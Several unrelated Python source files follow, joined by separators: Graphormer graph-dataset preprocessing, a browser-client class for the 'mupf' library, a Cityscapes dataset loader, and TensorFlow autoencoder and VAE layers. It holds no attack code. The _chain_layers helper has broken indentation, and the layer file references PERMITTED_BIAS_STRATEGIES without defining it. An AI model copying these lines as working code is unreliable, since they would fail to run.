    attn_edge_type = torch.zeros([N, N, edge_attr.size(-1)], dtype=torch.long)
    attn_edge_type[edge_index[0, :], edge_index[1, :]] = (
        convert_to_single_emb(edge_attr) + 1
    )  # [n_nodes, n_nodes, 1] for ZINC

    # All-pairs shortest paths plus the intermediate hops of each path.
    shortest_path_result, path = algos.floyd_warshall(adj_orig.numpy())
    max_dist = np.amax(shortest_path_result)
    edge_input = algos.gen_edge_input(max_dist, path, attn_edge_type.numpy())
    rel_pos = torch.from_numpy(shortest_path_result).long()

    # Attention bias including the virtual (graph-level) tokens.
    attn_bias = torch.zeros(
        [N + num_virtual_tokens, N + num_virtual_tokens], dtype=torch.float
    )

    # Adjacency padded with virtual tokens connected to every node.
    adj = torch.zeros(
        [N + num_virtual_tokens, N + num_virtual_tokens], dtype=torch.bool
    )
    adj[edge_index[0, :], edge_index[1, :]] = True
    for i in range(num_virtual_tokens):
        adj[N + i, :] = True
        adj[:, N + i] = True

    # Combine everything onto the item.  (A duplicate `item.adj` assignment
    # and dead commented-out randomization code were removed.)
    item.x = x
    item.adj = adj
    item.attn_bias = attn_bias
    item.attn_edge_type = attn_edge_type
    item.rel_pos = rel_pos
    item.in_degree = adj_orig.long().sum(dim=1).view(-1)
    item.out_degree = adj_orig.long().sum(dim=0).view(-1)
    item.edge_input = torch.from_numpy(edge_input).long()
    return item
class MyGraphPropPredDataset(PygGraphPropPredDataset):
    """OGB graph-property dataset that applies Graphormer preprocessing on access."""

    def download(self):
        super().download()

    def process(self):
        super().process()

    def __getitem__(self, idx):
        # Slices/index collections are delegated to the library implementation.
        if not isinstance(idx, int):
            return self.index_select(idx)
        item = self.get(self.indices()[idx])
        item.idx = idx
        return preprocess_item(item)
class MyPygPCQM4MDataset(PygPCQM4MDataset):
    """PCQM4M dataset that applies Graphormer preprocessing on access."""

    def download(self):
        super().download()

    def process(self):
        super().process()

    def __getitem__(self, idx):
        # Slices/index collections are delegated to the library implementation.
        if not isinstance(idx, int):
            return self.index_select(idx)
        item = self.get(self.indices()[idx])
        item.idx = idx
        return preprocess_item(item)
class MyZINCDataset(torch_geometric.datasets.ZINC):
    """ZINC dataset that applies Graphormer preprocessing on access."""

    def download(self):
        super().download()

    def process(self):
        super().process()

    def __getitem__(self, idx):
        # Slices/index collections are delegated to the library implementation.
        if not isinstance(idx, int):
            return self.index_select(idx)
        item = self.get(self.indices()[idx])
        item.idx = idx
        return preprocess_item(item)
class MyCoraDataset(torch_geometric.datasets.Planetoid):
    """Planetoid/Cora dataset that applies Graphormer preprocessing on access."""

    def download(self):
        super().download()

    def process(self):
        super().process()

    def __getitem__(self, idx):
        # Slices/index collections are delegated to the library implementation.
        if not isinstance(idx, int):
            return self.index_select(idx)
        item = self.get(self.indices()[idx])
        item.idx = idx
        return preprocess_item(item)
|
import json
import queue
import weakref
import mupf.exceptions as exceptions
import time
from .. import _command
from .. import _enhjson as enhjson
from .. import _features as F
from .. import _symbols as S
from .._remote import CallbackTask, RemoteObj
from ..log import loggable, LogManager
from . import _crrcan
from .._srvthr import Client_SrvThrItf
@loggable(
    'client/base.py/*<obj>',
    log_path=False,
    long = lambda self: f"<{type(self).__name__} {getattr(self, '_cid', '?')[0:6]}>",
    long_det = lambda self: f"<{type(self).__name__} {getattr(self, '_cid', '?')[0:6]}>"
)
class Client(Client_SrvThrItf):
    """
    Object of this class represents a window of a browser.

    It is not called "Window", because ``window`` is already a top-level object of the JS-side, and this object is a
    little more than that. A :class:`~mupf._remote.RemoteObj` of ``window`` can be obtained by :attr:`window`.
    """

    @loggable(log_results=False)
    def __init__(self, app, client_id):
        # Weak reference: the app owns its clients, not the other way round.
        self._app_wr = weakref.ref(app)
        self._cid = client_id
        app._clients_by_cid[client_id] = self
        self._user_agent = None
        # Features negotiated with the JS-side; populated during summoning.
        self.features = set()
        # Decoders for enhanced-JSON escape handlers ("@" -> remote object).
        self.enhjson_decoders = {
            "@": self.get_remote_obj,
        }
        # Callback tasks queued by the server thread, run by user code.
        self._callback_queue = queue.Queue()
        self._healthy_connection = True    # FIXME: this should not start as True by default
        self.command = _command.create_command_class_for_client(self)
        """ A ``command`` class used in command invoking syntax. """
        self.window = RemoteObj(0, self)
        """ A :class:`~mupf._remote.RemoteObj` object representing the ``window`` object on the JS-side. """
        # Cache of remote objects keyed by (rid, ctxrid); weak so the JS-side
        # proxies can be garbage-collected when unused.
        self._remote_obj_byid = weakref.WeakValueDictionary()
        self._clbid_by_callbacks = {}
        self._callbacks_by_clbid = {}
        self._callback_free_id = 0
        Client_SrvThrItf.__init__(self)
        # This callback unblocks `self.run_one_callback_blocking()`; otherwise it does nothing.
        self._get_callback_id(log_debug, '*close*')

    def _send(self, data):
        # Wrap the payload in an enhanced-JSON block when the negotiated
        # features include core_features, then serialize and delegate to the
        # server-thread interface.
        if F.core_features in self.features:
            data[3] = enhjson.EnhancedBlock(data[3])
        data = enhjson.encode(data, escape=self._escape_for_json)
        Client_SrvThrItf._send(self, data)

    def _escape_for_json(self, value):
        """ Encoding advanced types for JSON transport

        This method is used by :func:`mupf._enhjson.encode` to encode all types beyond dicts, arrays, floats etc. It
        should return either a :class:`enhjson.JsonElement` enum member or a tuple. The tuple is the escape structure
        for an advanced type (handler and arguments).

        We can here get a help from :func:`enhjson.test_element_type` function that will return a
        :class:`enhjson.JsonElement` enum member if it can.
        """
        if isinstance(value, RemoteObj):
            # Remote objects are sent by reference id ("@" escape handler).
            return '@', value[S.rid]
        json_type = enhjson.test_element_type(value)
        if json_type == enhjson.JsonElement.Unknown:
            if callable(value):
                # Callables are registered and sent as callback ids ("$").
                return '$', None, self._get_callback_id(value)
            else:
                # If we're here, `value` should have `.enh_json_esc()` method or fail
                return enhjson.JsonElement.Autonomous
        else:
            return json_type

    @loggable(log_enter=False)
    def __bool__(self):
        # for `while client:` syntax
        return self._healthy_connection

    @loggable()
    def _decode_crrcan_msg(self, raw_json):
        # Decode one crrcan protocol message; on an error result (msg[0] == 1
        # with non-zero status) rewrite it into an exception object.
        msg = json.loads(raw_json)
        if F.core_features in self.features:
            msg[3] = enhjson.decode_enhblock(msg[3], self.enhjson_decoders)
        if msg[0] == 1 and msg[2] != 0:
            error_data = msg[3]['result']
            # Map the JS-side source position onto the installed code line.
            if line_id := self._app_wr()._identify_line_in_code(error_data[2:5]):
                error_data[2:5] = line_id
            msg[3]['result'] = exceptions.create_from_result(error_data)
        return msg

    @loggable()
    def get_remote_obj(self, rid, ctxrid=None):
        # rid 0 is always the window object; other ids are cached per
        # (rid, ctxrid) pair and created lazily.
        if rid == 0:
            return self.window
        if (rid, ctxrid) in self._remote_obj_byid:
            return self._remote_obj_byid[(rid, ctxrid)]
        else:
            if ctxrid is None:
                rem_obj = RemoteObj(rid, self, None)
            else:
                rem_obj = RemoteObj(rid, self, self.get_remote_obj(ctxrid))
            self._remote_obj_byid[(rid, ctxrid)] = rem_obj
            return rem_obj

    @loggable(log_results=False)
    def summoned(self):
        # Called once the browser window has connected and features are known.
        self._safe_dunders_feature = (F.safe_dunders in self.features)
        if F.strict_feature_list in self.features and self.features != self.app._features:
            raise ValueError(f'features computed {self.features} different from requested {self.app._features} while `strict_feature_list` feature turned on')

    @loggable()
    def close(self, dont_wait=False, _dont_remove_from_app=False):    # TODO: dont_wait not implemented
        if self._healthy_connection:
            # This command triggers the closing of the websocket connection in normal way.
            last_cmd_ccid = self.command('*last*')().result
        if not _dont_remove_from_app:
            del self.app._clients_by_cid[self._cid]

    @loggable()
    def await_connection(self):
        # NOTE(review): placeholder — no waiting is implemented here; confirm intent.
        pass

    @loggable()
    def install_javascript(self, code=None, *, src=None, remove=True):
        # Exactly one of `code` (inline JS) or `src` (URL) must be given.
        if code is not None and src is None:
            return self.command('*install*')(code, remove=remove)
        elif src is not None and code is None:
            return self.command('*install*')(src=src, remove=remove)
        else:
            raise ValueError('you must provide just one of `code` or `src`')

    @loggable()
    def install_commands(self, code=None, src=None):
        self.install_javascript(code, src=src, remove=True).result
        # Refresh the legal command names from the JS-side when supported.
        if F.core_features in self.features:
            self.command._legal_names = self.command('*getcmds*')().result

    @loggable()
    def _get_callback_id(self, func, clbid=None):
        # Return the id already assigned to `func`, or register it under a new
        # (or explicitly requested) id.
        if func in self._clbid_by_callbacks:
            return self._clbid_by_callbacks[func]
        else:
            if clbid is None:
                clbid = self._callback_free_id
                self._callback_free_id += 1
            elif clbid in self._callbacks_by_clbid:
                raise ValueError(f'Callback id `{clbid!r}` already in use for callback `{self._callbacks_by_clbid[clbid]!r}`')
            self._clbid_by_callbacks[func] = clbid
            self._callbacks_by_clbid[clbid] = func
            return clbid

    @loggable()
    def run_one_callback_blocking(self):
        if not self._healthy_connection:
            self.run_callbacks_nonblocking()    # This is to run all notifications (callbacks will be supressed)
            return
        callback_task = self._callback_queue.get(block=True)
        callback_task.run()

    @loggable()
    def run_callbacks_nonblocking(self, count_limit=None, time_limit=None):
        # Drain the callback queue without blocking, bounded by an optional
        # task count and/or wall-clock budget.
        t0 = time.time()
        count = 0
        while True:
            if (
                (time_limit is not None and time.time() >= t0+time_limit)
                or (count_limit is not None and count >= count_limit)
            ):
                break
            try:
                callback_task = self._callback_queue.get_nowait()
            except queue.Empty:
                break
            else:
                # On an unhealthy connection only notifications are run.
                callback_task.run(only_notifications = not self._healthy_connection)
                count += 1

    @loggable()
    def run_callbacks_blocking_until_closed(self, silent_user_close=True):
        # if silent_user_close try/except ClosedUnexpectedly etc...
        while self:
            self.run_one_callback_blocking()

    @property
    @loggable('*.:', log_enter=False)
    def app(self):
        # Dereference the weakly-held owning app.
        return self._app_wr()

    @property
    @loggable('*.:', log_enter=False)
    def cid(self):
        return self._cid

    @property
    @loggable('*.:', log_enter=False)
    def url(self):
        # The address the browser window uses to reach this client.
        return f"http://{self.app._host}:{self.app._port}/mupf/{self.cid}/"

    def _get_eventloop(self):
        return self._app_wr()._event_loop
@loggable('client/base.py/debug')
def log_debug(*args, **kwargs):
    """No-op debug hook; calls are recorded by the ``loggable`` machinery only."""
    pass
@loggable('client/base.py/sending_event', hidden=True)
def log_sending_event(part, *args, **kwargs):
    """No-op hook marking one part of a send; observed by :class:`LogSentTaskBody`."""
    pass
@loggable('client/base.py/send_task_body')
class LogSentTaskBody(LogManager):
    """Log manager stitching 'sending_event' parts into one writer stream."""

    current_writer_id = None

    def on(self):
        # Stay on only if at least one sentinel could be employed.
        if self.employ_sentinels('client/base.py/sending_event') > 0:
            super().on()
        else:
            super().off()

    def off(self):
        self.dismiss_all_sentinels()
        super().off()

    def on_event(self, event):
        if not self.state:
            return
        if not event.entering():
            return
        part = event.arg('part')
        finish = False
        if part == 'start':
            # A 'start' part opens a fresh writer for this send.
            writer = self.new_writer()
            self.current_writer_id = writer.id_
        else:
            writer = self.find_writer(id_=self.current_writer_id)
            if part == 'end':
                # An 'end' part finishes and disposes of the writer.
                finish = True
                self.delete_writer(self.current_writer_id)
                self.current_writer_id = None
        writer.write(self.format_args(event.args[1:], event.kwargs), finish)
|
# Repository: rubendfcosta/neural
from os import listdir
from os.path import join
import cv2
from numpy import array
from torch.utils.data import Dataset
class Cityscapes(Dataset):
    """Cityscapes street-scene dataset.

    Parameters
    ----------
    root_dir : str
        Dataset root containing ``leftImg8bit`` and ``gtFine``/``gtCoarse``.
    split : str or list of str
        Any combination of 'train', 'valid' and 'trainextra'.
    type : str
        One of 'semantic', 'instance' or 'panotic' — selects which label
        file(s) each example references.  (Spelling kept for compatibility.)
    transforms : callable, optional
        Albumentations-style callable invoked as ``transforms(image=..., ...)``.
        Defaults to ``dict``, which simply packages the arrays unchanged.
    """

    CLASSES = array([
        'unlabeled', 'ego vehicle', 'rectification border', 'out of roi',
        'static', 'dynamic', 'ground', 'road', 'sidewalk', 'parking',
        'rail track', 'building', 'wall', 'fence', 'guard rail',
        'bridge', 'tunnel', 'pole', 'polegroup', 'traffic light',
        'traffic sign', 'vegetation', 'terrain', 'sky', 'person',
        'rider', 'car', 'truck', 'bus', 'caravan', 'trailer', 'train',
        'motorcycle', 'bicycle', 'license plate'])

    # Maps raw label ids to the 19 training classes; 255 marks "ignore".
    TRAIN_MAPPING = array([
        255, 255, 255, 255, 255, 255, 255, 0, 1, 255, 255, 2, 3, 4, 255,
        255, 255, 5, 255, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 255,
        255, 16, 17, 18, 255])

    def __init__(self, root_dir, split='train', type='semantic', transforms=None):
        self.type = type

        def generate_examples(images_dir, labels_dir, annotation='fine'):
            # Yield dicts of file paths; label files share the image id stem.
            labels_type = 'gtFine' if annotation == 'fine' else 'gtCoarse'
            cities = listdir(images_dir)
            for city in cities:
                city_dir = join(images_dir, city)
                for f in listdir(city_dir):
                    id = f[:-16]  # strip the '_leftImg8bit.png' suffix
                    image = join(images_dir, city, f)
                    semantic = join(labels_dir, city,
                                    f'{id}_{labels_type}_labelIds.png')
                    instance = join(labels_dir, city,
                                    f'{id}_{labels_type}_instanceIds.png')
                    if type == 'semantic':
                        yield {'image': image, 'label': semantic}
                    elif type == 'instance':
                        yield {'image': image, 'label': instance}
                    elif type == 'panotic':
                        yield {
                            'image': image,
                            'semantic': semantic,
                            'instance': instance,
                        }

        if not isinstance(split, list):
            split = [split]
        self.examples = []
        # Bug fix: these branches were `elif`s, so requesting several splits
        # (e.g. ['train', 'valid']) silently loaded only the first one.
        if 'train' in split:
            self.examples += list(generate_examples(
                join(root_dir, 'leftImg8bit', 'train'),
                join(root_dir, 'gtFine', 'train'),
                'fine'
            ))
        if 'valid' in split:
            self.examples += list(generate_examples(
                join(root_dir, 'leftImg8bit', 'val'),
                join(root_dir, 'gtFine', 'val'),
                'fine'
            ))
        if 'trainextra' in split:
            self.examples += list(generate_examples(
                join(root_dir, 'leftImg8bit', 'train_extra'),
                join(root_dir, 'gtCoarse', 'train_extra'),
                'coarse'
            ))
        self.transforms = transforms if transforms is not None else dict

    def __len__(self):
        return len(self.examples)

    def __getitem__(self, index):
        """Load the image (RGB) and label(s) for one example lazily."""
        example = self.examples[index]
        image = example['image']
        image = cv2.imread(image, cv2.IMREAD_COLOR)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        if self.type == 'semantic':
            label = cv2.imread(example['label'], cv2.IMREAD_GRAYSCALE)
            label = self.TRAIN_MAPPING[label]
            return self.transforms(image=image, mask=label)
        elif self.type == 'instance':
            label = cv2.imread(example['label'], cv2.IMREAD_GRAYSCALE)
            return self.transforms(image=image, mask=label)
        elif self.type == 'panotic':
            semantic = cv2.imread(example['semantic'], cv2.IMREAD_GRAYSCALE)
            semantic = self.TRAIN_MAPPING[semantic]
            instance = cv2.imread(example['instance'], cv2.IMREAD_GRAYSCALE)
            return self.transforms(
                image=image,
                semantic=semantic,
                instance=instance)
        else:
            raise RuntimeError("Invalid cityscapes dataset type.")
|
# -*- coding: utf-8 -*-
#
# Author: <NAME> <<EMAIL>>
#
# Layers for the autoencoder(s)
from __future__ import print_function, absolute_import, division
from sklearn.base import BaseEstimator
from sklearn.externals import six
import tensorflow as tf
import numpy as np
from abc import ABCMeta, abstractmethod
from ..utils import overrides, get_random_state, DTYPE
from .base import _validate_positive_integer, _validate_float
# Explicit public API of this module.
__all__ = [
    'GaussianDenseLayer',
    'SymmetricalAutoEncoderTopography',
    'SymmetricalVAETopography',
    'XavierDenseLayer'
]
def _chain_layers(layers, tensor):
result = tensor
for layer in layers:
result = layer.feed_forward(result)
return result
class _BaseSymmetricalTopography(BaseEstimator):
    # Shared scaffolding for the symmetrical AE/VAE architectures: validates
    # hyper-parameters, builds the encode/decode layer stacks via the
    # subclass hook `_initialize_layers`, and records the overall shape.
    # NOTE(review): this class is not an ABC (no ABCMeta/abc.ABC base), so the
    # @abstractmethod below is not actually enforced — confirm intent.
    def __init__(self, X_placeholder, n_hidden, input_shape, activation, layer_type,
                 dropout, bias_strategy, random_state, **kwargs):
        # validate layer dims — a scalar int becomes a single-element list
        if not isinstance(n_hidden, list):
            if not isinstance(n_hidden, (int, np.int)):
                raise ValueError('n_hidden must be an int or list')
            n_hidden = [n_hidden]
        # validate layer types
        if layer_type not in PERMITTED_LAYER_TYPES:
            raise ValueError('layer_type must be one of %r' % list(PERMITTED_LAYER_TYPES.keys()))
        LayerClass = PERMITTED_LAYER_TYPES[layer_type]
        # validate random state
        random_state = get_random_state(random_state)
        # set encode/decode operations and the layer lists (subclass hook)
        (self.encode, self.decode,
         self.encode_layers_, self.decode_layers_) = self._initialize_layers(X_placeholder=X_placeholder,
                                                                             n_hidden=n_hidden,
                                                                             input_shape=input_shape,
                                                                             LayerClass=LayerClass,
                                                                             activation=activation,
                                                                             dropout=dropout,
                                                                             bias_strategy=bias_strategy,
                                                                             random_state=random_state,
                                                                             **kwargs)
        # set up the shape of the architecture: fan-in of every layer,
        # plus the fan-out of the final decode layer
        shape = []
        for e in self.encode_layers_:
            shape.append(e.fan_in)
        last_decode = None
        for d in self.decode_layers_:
            last_decode = d
            shape.append(d.fan_in)
        # tack on the output shape
        shape.append(last_decode.fan_out)
        self.shape = tuple(shape)

    @abstractmethod
    def _initialize_layers(self, X_placeholder, n_hidden, input_shape, LayerClass, activation,
                           dropout, bias_strategy, random_state, **kwargs):
        """Initialize all the layers"""
        # We know it's a list. There will be two times as many layers as the length of n_hidden:
        # n_hidden * encode layer, and n_hidden * decode layer. Since the dimensions are
        # piped into one another, stagger them (zipped with a lag), and then reverse for
        # the decode layer.

    def get_weights_biases(self):
        """Get a list of the weights and biases.

        Returns
        -------
        weights : tuple
            A tuple of ``tf.Tensor`` values that correspond to
            the weights layers.

        biases : tuple
            A tuple of ``tf.Variable`` values that correspond
            to the bias vectors.
        """
        return list(zip(*[(layer.w_, layer.b_) for layer in (self.encode_layers_ + self.decode_layers_)]))
class SymmetricalAutoEncoderTopography(_BaseSymmetricalTopography):
    """The architecture of the neural network. This connects layers together given
    the ``layer_type``.

    Parameters
    ----------
    X_placeholder : TensorFlow placeholder
        The placeholder for ``X``.

    n_hidden : int or list
        The shape of the hidden layers. This will be reflected, i.e., if the provided value
        is ``[100, 50]``, the full topography will be ``[100, 50, 100]``

    input_shape : int
        The number of neurons in the input layer.

    activation : callable
        The activation function.

    layer_type : str
        The type of layer, i.e., 'xavier'. This is the type of layer that
        will be generated. One of {'xavier', 'gaussian'}

    dropout : float, optional (default=1.0)
        Dropout is a mechanism to prevent over-fitting a network. Dropout functions
        by randomly dropping hidden units (and their connections) during training.
        This prevents units from co-adapting too much.

    bias_strategy : str, optional (default='zeros')
        The strategy for initializing the bias vector. Default is 'zeros' and will
        initialize all bias values as zeros. The alternative is 'ones', which will
        initialize all bias values as ones.

    random_state : int, ``np.random.RandomState`` or None, optional (default=None)
        The numpy random state for seeding random TensorFlow variables in weight initialization.

    Attributes
    ----------
    encode_layers_ : list
        The encode layers

    decode_layers_ : list
        The decode layers

    shape : tuple
        The architecture shape
    """
    def __init__(self, X_placeholder, n_hidden, input_shape, activation, layer_type='xavier', dropout=1.,
                 bias_strategy='zeros', random_state=None):
        super(SymmetricalAutoEncoderTopography, self).__init__(X_placeholder=X_placeholder,
                                                               n_hidden=n_hidden,
                                                               input_shape=input_shape,
                                                               activation=activation,
                                                               layer_type=layer_type,
                                                               dropout=dropout,
                                                               bias_strategy=bias_strategy,
                                                               random_state=random_state)

    @overrides(_BaseSymmetricalTopography)
    def _initialize_layers(self, X_placeholder, n_hidden, input_shape, LayerClass, activation,
                           dropout, bias_strategy, random_state, **kwargs):
        # Bug fix: previously `n_hidden.insert(0, input_shape)` mutated the
        # caller's list in place; build a fresh list instead.
        n_hidden = [input_shape] + n_hidden
        encode_dimensions = list(zip(n_hidden[:-1], n_hidden[1:]))
        decode_dimensions = [(v, k) for k, v in reversed(encode_dimensions)]  # pyramid back to n_features
        seed = random_state.seed_value

        # this procedure creates a symmetrical topography
        encode_layers, decode_layers = [], []
        n_layers = len(encode_dimensions)
        for i in range(n_layers):
            encode_fan = encode_dimensions[i]
            decode_fan = decode_dimensions[i]

            # build them simultaneously without duplicated code
            enc_dec_layers = tuple(
                LayerClass(fan_in=dims[0], fan_out=dims[1],
                           activation=activation, dropout=dropout,
                           bias_strategy=bias_strategy,
                           seed=seed)
                for dims in (encode_fan, decode_fan)
            )

            # split the tuple
            encode_layers.append(enc_dec_layers[0])
            decode_layers.append(enc_dec_layers[1])

        # the encode/decode operations: decode consumes the encode output
        encoder = _chain_layers(encode_layers, X_placeholder)
        decoder = _chain_layers(decode_layers, encoder)
        return encoder, decoder, encode_layers, decode_layers
class SymmetricalVAETopography(_BaseSymmetricalTopography):
    """The architecture of the VAE autoencoder. This connects layers together given
    the ``layer_type`` and provides the structure for the inferential network as well
    as the generative network.

    Parameters
    ----------
    X_placeholder : TensorFlow placeholder
        The placeholder for ``X``.

    n_hidden : int or list
        The shape of the hidden layers. This will be reflected, i.e., if the provided value
        is ``[100, 50]``, the full topography will be ``[100, 50, 100]``

    input_shape : int
        The number of neurons in the input layer.

    activation : callable
        The activation function.

    n_latent_factors : int or float
        The size of the latent factor layer learned by the ``VariationalAutoEncoder``

    layer_type : str
        The type of layer, i.e., 'xavier'. This is the type of layer that
        will be generated. One of {'xavier', 'gaussian'}

    dropout : float, optional (default=1.0)
        Dropout is a mechanism to prevent over-fitting a network. Dropout functions
        by randomly dropping hidden units (and their connections) during training.
        This prevents units from co-adapting too much.

    bias_strategy : str, optional (default='zeros')
        The strategy for initializing the bias vector. Default is 'zeros' and will
        initialize all bias values as zeros. The alternative is 'ones', which will
        initialize all bias values as ones.

    random_state : int, ``np.random.RandomState`` or None, optional (default=None)
        The numpy random state for seeding random TensorFlow variables in weight initialization.

    Attributes
    ----------
    encode_layers_ : list
        The encode layers

    decode_layers_ : list
        The decode layers

    shape : tuple
        The architecture shape
    """
    def __init__(self, X_placeholder, n_hidden, input_shape, activation, n_latent_factors, layer_type='xavier',
                 dropout=1., bias_strategy='zeros', random_state=None):
        # validate n_latent_factors
        self.n_latent_factors = n_latent_factors
        if isinstance(self.n_latent_factors, (int, np.int)):
            self.n_latent_factors = _validate_positive_integer(self, 'n_latent_factors')
        else:
            # otherwise, if it's a float, we are going to compress the n_features by that amount
            if isinstance(self.n_latent_factors, (float, np.float)):
                compress = _validate_float(self, 'n_latent_factors', 1.0)
                # at least two latent factors, rounded fraction of the input
                self.n_latent_factors = max(2, int(round(compress * input_shape)))
            else:
                raise TypeError('n_latent_factors must be an int or a float')

        # python lets us call the super constructor anywhere in the constructor
        super(SymmetricalVAETopography, self).__init__(X_placeholder=X_placeholder,
                                                       n_hidden=n_hidden,
                                                       input_shape=input_shape,
                                                       activation=activation,
                                                       layer_type=layer_type,
                                                       dropout=dropout,
                                                       bias_strategy=bias_strategy,
                                                       random_state=random_state,
                                                       **{'n_latent_factors': self.n_latent_factors})

    @staticmethod
    def _gaussian_sample(mu, log_sigma, random_state):
        # Reparameterization trick: z = mu + eps * exp(log_sigma), eps ~ N(0, I)
        with tf.name_scope('gaussian_sample'):
            epsilon = tf.random_normal(tf.shape(log_sigma), name='epsilon',
                                       seed=random_state.seed_value,
                                       dtype=DTYPE)
            return tf.add(mu, tf.multiply(epsilon, tf.exp(log_sigma)))  # N(mu, I * sigma**2)

    @overrides(_BaseSymmetricalTopography)
    def _initialize_layers(self, X_placeholder, n_hidden, input_shape, LayerClass, activation,
                           dropout, bias_strategy, random_state, **kwargs):
        n_latent = kwargs.pop('n_latent_factors')  # will be there because we're injecting it in the super constructor
        seed = random_state.seed_value

        # AE makes it easy to string layers together, but the VAE is a bit more
        # complex. So we'll use the _chain method that will string layers together
        # I.e., _chain([layer_1, layer_2]) -> layer_2(layer_1(x))

        # inject input_shape like in AE
        # NOTE(review): this mutates the caller's `n_hidden` list in place — confirm intent.
        n_hidden.insert(0, input_shape)
        encode_dimensions = list(zip(n_hidden[:-1], n_hidden[1:]))
        decode_dimensions = [(v, k) for k, v in reversed(encode_dimensions)]

        # insert the dims for the latent -> decode dimensions
        decode_dimensions.insert(0, (n_latent, n_hidden[-1]))

        # inferential network layers: q(z|x)
        encoding_layers = [
            LayerClass(fan_in=fan_in, fan_out=fan_out,
                       activation=activation, dropout=dropout,
                       bias_strategy=bias_strategy,
                       seed=seed)
            for fan_in, fan_out in encode_dimensions
        ]

        # chain:
        encode = _chain_layers(encoding_layers, X_placeholder)

        # add the latent distribution ("hidden code")
        # z ~ N(z_mean, exp(z_log_sigma) ** 2)
        z_mean, z_log_sigma = tuple(
            LayerClass(fan_in=n_hidden[-1], fan_out=n_latent, activation=activation,
                       dropout=dropout, bias_strategy=bias_strategy,
                       seed=seed).feed_forward(encode)  # operate on encode operation
            for _ in ('z_mean', 'z_log_sigma')  # just because easier to debug...
        )

        # kingma & welling: only 1 draw necessary as long as minibatch large enough (>100)
        z = self._gaussian_sample(z_mean, z_log_sigma, random_state)

        # define decode layers - only to the second to last. The last layer
        # should use a sigmoid activation regardless of the defined activation
        # (because binary cross entropy). These are the generative layers: p(x|z)
        decoding_layers = [
            LayerClass(fan_in=fan_in, fan_out=fan_out,
                       activation=activation, dropout=dropout,
                       bias_strategy=bias_strategy,
                       seed=seed)
            for fan_in, fan_out in decode_dimensions[:-1]
        ]

        # append the FINAL layer class which uses sigmoid and squashes output to [0, 1]
        fi, fo = decode_dimensions[-1]  # fee, fi, fo... heh
        decoding_layers.append(LayerClass(fan_in=fi, fan_out=fo,
                                          activation=tf.nn.sigmoid, dropout=dropout,
                                          bias_strategy=bias_strategy,
                                          seed=seed))
        decode = _chain_layers(decoding_layers, z)  # put all layers together

        # set some internals...
        self.z_mean_, self.z_log_sigma_, self.z_ = z_mean, z_log_sigma, z
        return encode, decode, encoding_layers, decoding_layers
class _BaseDenseLayer(six.with_metaclass(ABCMeta, BaseEstimator)):
    """Common machinery for dense layers: stores hyper-parameters, validates
    the bias strategy and materializes the (dropout-wrapped) weight and bias
    variables via the subclass hook ``_initialize_weights_biases``."""

    def __init__(self, fan_in, fan_out, activation, dropout, bias_strategy, seed):
        self.fan_in = fan_in
        self.fan_out = fan_out
        self.activation = activation
        self.dropout = dropout
        self.seed = seed

        # Resolve the bias-initialization callable, rejecting unknown names.
        if bias_strategy not in PERMITTED_BIAS_STRATEGIES:
            raise ValueError("bias_strategy must be one of %r" % list(PERMITTED_BIAS_STRATEGIES.keys()))
        self.bias_strategy = PERMITTED_BIAS_STRATEGIES[bias_strategy]

        # Create the variables, then wrap the weight matrix in dropout.
        weights, self.b_ = self._initialize_weights_biases()
        self.w_ = tf.nn.dropout(weights, self.dropout)

    def feed_forward(self, tensor):
        """Apply ``activation(tensor @ W + b)``."""
        return self.activation(tf.add(tf.matmul(tensor, self.w_), self.b_))

    @abstractmethod
    def _initialize_weights_biases(self):
        """Initialize based on which type"""
class GaussianDenseLayer(_BaseDenseLayer):
    """A fully connected layer of neurons initialized via random normal distributions.

    Parameters
    ----------
    fan_in : int
        The dimension of the input, i.e., the number of neurons in the input.

    fan_out : int
        The dimension of the output, i.e., the number of neurons in the output.

    activation : callable
        The activation function.

    dropout : TensorFlow Placeholder
        The placeholder for the dropout

    bias_strategy : str, optional (default='zeros')
        The strategy for initializing the bias vector. Default is 'zeros' and will
        initialize all bias values as zeros. The alternative is 'ones', which will
        initialize all bias values as ones.

    seed : int, optional (default=42)
        The seed for random variable generation.

    References
    ----------
    [1] Based on code at https://github.com/fastforwardlabs/vae-tf
    """

    def __init__(self, fan_in, fan_out, activation, dropout, bias_strategy='zeros', seed=42):
        super(GaussianDenseLayer, self).__init__(fan_in=fan_in, fan_out=fan_out, activation=activation,
                                                 dropout=dropout, bias_strategy=bias_strategy, seed=seed)

    @overrides(_BaseDenseLayer)
    def _initialize_weights_biases(self):
        """Initialize weights in a normalized sense (adaptation of Xavier initialization)"""
        # stddev = sqrt(2 / fan_in), cast to the module-wide dtype.
        scale = tf.cast((2 / self.fan_in) ** 0.5, DTYPE)
        w0 = tf.random_normal([self.fan_in, self.fan_out], stddev=scale, seed=self.seed, dtype=DTYPE)
        b0 = self.bias_strategy([self.fan_out], dtype=DTYPE)
        return tf.Variable(w0, trainable=True), tf.Variable(b0, trainable=True)
class XavierDenseLayer(_BaseDenseLayer):
    """A fully connected layer of neurons initialized via Xavier initialization distributions.

    Parameters
    ----------
    fan_in : int
        The dimension of the input, i.e., the number of neurons in the input.

    fan_out : int
        The dimension of the output, i.e., the number of neurons in the output.

    activation : callable
        The activation function.

    dropout : TensorFlow Placeholder
        The placeholder for the dropout

    bias_strategy : str, optional (default='zeros')
        The strategy for initializing the bias vector. Default is 'zeros' and will
        initialize all bias values as zeros. The alternative is 'ones', which will
        initialize all bias values as ones.

    seed : int, optional (default=42)
        The seed for random variable generation.

    References
    ----------
    [1] Based on code at https://github.com/fastforwardlabs/vae-tf
    """

    def __init__(self, fan_in, fan_out, activation, dropout, bias_strategy='zeros', seed=42):
        super(XavierDenseLayer, self).__init__(fan_in=fan_in, fan_out=fan_out, activation=activation,
                                               dropout=dropout, seed=seed, bias_strategy=bias_strategy)

    @overrides(_BaseDenseLayer)
    def _initialize_weights_biases(self):
        """Initialize weights via Xavier initialization"""
        # Uniform over [-b, b] with b = sqrt(6 / (fan_in + fan_out)).
        bound = np.sqrt(6.0 / (self.fan_in + self.fan_out))
        initial_w = tf.random_uniform(shape=[self.fan_in, self.fan_out], minval=-bound,
                                      maxval=bound, dtype=DTYPE, seed=self.seed)
        initial_b = self.bias_strategy([self.fan_out], dtype=DTYPE)
        return tf.Variable(initial_w, trainable=True), tf.Variable(initial_b, trainable=True)
# these are strategy/type mappings for mapping a str to a callable
# Layer classes selectable by name.
PERMITTED_LAYER_TYPES = {
    'gaussian': GaussianDenseLayer,
    'xavier': XavierDenseLayer,
}
